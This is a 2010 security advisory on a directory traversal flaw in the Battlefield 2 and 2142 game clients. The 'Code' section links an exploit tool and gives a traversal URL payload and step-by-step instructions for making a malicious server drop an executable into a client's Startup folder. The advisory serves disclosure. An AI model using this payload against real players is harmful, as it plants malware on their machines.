118 lines
No EOL
3.5 KiB
Text
118 lines
No EOL
3.5 KiB
Text
Source:
|
|
http://aluigi.org/adv/bf2urlz-adv.txt
|
|
|
|
#######################################################################
|
|
|
|
Luigi Auriemma
|
|
|
|
Application: Refractor 2 engine
|
|
Games: Battlefield 2 <= 1.50 (aka 1.5.3153-802.0)
|
|
http://www.battlefield.ea.com/battlefield/bf2/
|
|
Battlefield 2142 <= 1.50 (aka 1.10.48.0)
|
|
http://battlefield.ea.com/battlefield/bf2142/
|
|
...
|
|
other games developed with the same engine could be
|
|
vulnerable like Battlefield Heroes
|
|
Platforms: Windows
|
|
Bug: client URLs directory traversal
|
|
Exploitation: remote, versus clients
|
|
Date: 29 Jun 2010
|
|
Author: Luigi Auriemma
|
|
e-mail: aluigi@autistici.org
|
|
web: aluigi.org
|
|
|
|
|
|
#######################################################################
|
|
|
|
|
|
1) Introduction
|
|
2) Bug
|
|
3) The Code
|
|
4) Fix
|
|
|
|
|
|
#######################################################################
|
|
|
|
===============
|
|
1) Introduction
|
|
===============
|
|
|
|
|
|
The Battlefield series is one of the most famous and played series of
|
|
games deeply devoted to multiplayer gaming.
|
|
The series is developed by DICE (http://www.dice.se) and published by
|
|
Electronic Arts.
|
|
|
|
|
|
#######################################################################
|
|
|
|
======
|
|
2) Bug
|
|
======
|
|
|
|
|
|
Each BF2 and BF2142 server has some fields where the admin can specify
|
|
the links to files and images like the sponsor and community logo.
|
|
The sponsor logo is visible immediately when the client gets the list
|
|
of servers and selects the server with the mouse (one-click, not join)
|
|
while the second one is loaded when the client joins that server.
|
|
|
|
Exist also other URLs like DemoDownloadURL, DemoIndexURL and
|
|
CustomMapsURL that can be exploited when the client joins the malicious
|
|
server.
|
|
|
|
The client performs a very simple operation, it gets the URL and
|
|
downloads the file saving it locally using its original name in the
|
|
following folder:
|
|
C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache\SERVER
|
|
C:\Documents and Settings\USER\My Documents\Battlefield 2142\LogoCache\SERVER
|
|
where USER is the Windows account of the current user and SERVER is the
|
|
address of the web server, while LogoCache could be HttpCache if are
|
|
used the URLs for downloading demos and maps.
|
|
|
|
The vulnerability resides in the missing handling of the backslash char
|
|
with the consequence that the name of the file will include the
|
|
classical directory traversal pattern allowing a malicious server to
|
|
upload malicious executables on the clients.
|
|
|
|
Note that the loading of the URLs is automatic and doesn't seem
|
|
possible to disable this feature.
|
|
|
|
|
|
#######################################################################
|
|
|
|
===========
|
|
3) The Code
|
|
===========
|
|
|
|
http://aluigi.org/testz/onlywebs.zip
|
|
or
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14267.zip (bfonlywebs.zip)
|
|
|
|
- launch: onlywebs.exe c:\malicious_file.exe
|
|
- start the server launcher using the following string as sponsor and
|
|
community logo URL:
|
|
http://SERVER/..\..\..\..\Start Menu\Programs\Startup\owned.exe
|
|
- Save and Start the server
|
|
- launch the client and go in the multiplayer menu
|
|
- when the refreshing of the list is terminated select or join the
|
|
malicious server
|
|
- now the file owned.exe will be available in the Startup folder of the
|
|
client and will be executed at the next login or reboot
|
|
|
|
note that the server could be not seen if you are running it on the
|
|
same machine of the client (127.0.0.1), in that case use another
|
|
computer/vm (a server or an UDP datapipe on port 29900)
|
|
|
|
|
|
#######################################################################
|
|
|
|
======
|
|
4) Fix
|
|
======
|
|
|
|
|
|
No fix.
|
|
|
|
|
|
####################################################################### |